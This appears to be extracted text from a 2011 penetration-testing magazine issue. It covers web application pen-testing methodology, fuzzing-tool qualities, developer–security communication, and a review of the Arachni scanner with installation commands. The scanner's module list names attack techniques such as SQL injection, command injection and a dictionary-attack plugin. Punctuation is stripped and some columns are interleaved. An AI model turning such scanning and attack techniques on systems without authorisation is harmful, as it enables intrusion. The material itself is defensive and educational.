These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
Technical VulnerabilitiesWhere such vulnerabilities can be examined through the following tests Cross-Site-Scripting Injection Flaws and Buffer Overflow Automated systems and tools which analyze and test the web applications are much better equipped to test for technical vulnerabilities than the manual penetration tests While automated testing and scanning tools may not be able
012011 (1) November
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
to address 100 of all the technical vulnerabilities there is no reason to believe that such tools will achieve such goal in the near future Current problems facing the web application tools are the following client-side generated URLs required JavaScript functions application logout transaction-based systems requiring specific user paths automated form submission one time passwords and Infinite web sites with random URL-based session IDs
Logical VulnerabilitiesWhere such vulnerabilities can manipulate the logic of the application to do tasks that were never intended to be done While both an automated scanning tool and skilled penetration tester can navigate through a web application only the latter is able to understand what the logic behind specific workflow or how the application works in general Understanding the logic and the flow of an application allows the manual pen testing to subvert or overthrow the business logic where security vulnerabilities can be exposed For instance an application might direct the user from point A to point B to Point C based on the logic flow implemented within the application where point B represents a security validation check A manual review of the application might show that it is possible for attackers to manipulate the web application to go directly from point A to point C and bypassing the security validation exists at point B
History has proven that software bugs defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities where it can lead to unauthorized access to the systems networks and application information It is also proven that most of the security breaches occur due to vulnerabilities within the web application layer (ie attacks using the HTTPHTTPS protocol) In such attacks traditional security mechanism such as firewalls and IDS provide little or no protection against attacks on the web applications
Security analyses review the critical components of a web-based portal e-commerce application or web services platform Part of the analyses work that can be done is to identify vulnerabilities inherent in the code of the web application itself regardless of the technology implemented back-end database or web server used by the application
Itrsquos imperative to point out that the web application penetration assessments should be designed based upon defined threat-model It should also be based upon the evaluation of the integration between components (eg third party components and in-house built components) and the overall deployment configuration that represents a solid choice for establishing a baseline security assessment Application penetration assessments server as a cost-effective mechanism to identify a set of vulnerabilities in a given application where it exposes the most likely exploit vulnerabilities
Figure 1 The different activities of the Pen Testing processes
WEB APP SECURITY
Page 14 httppentestmagcom012011 (1) November Page 15 httppentestmagcom012011 (1) November
and allow to find similar instances of vulnerabilities throughout the code
How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
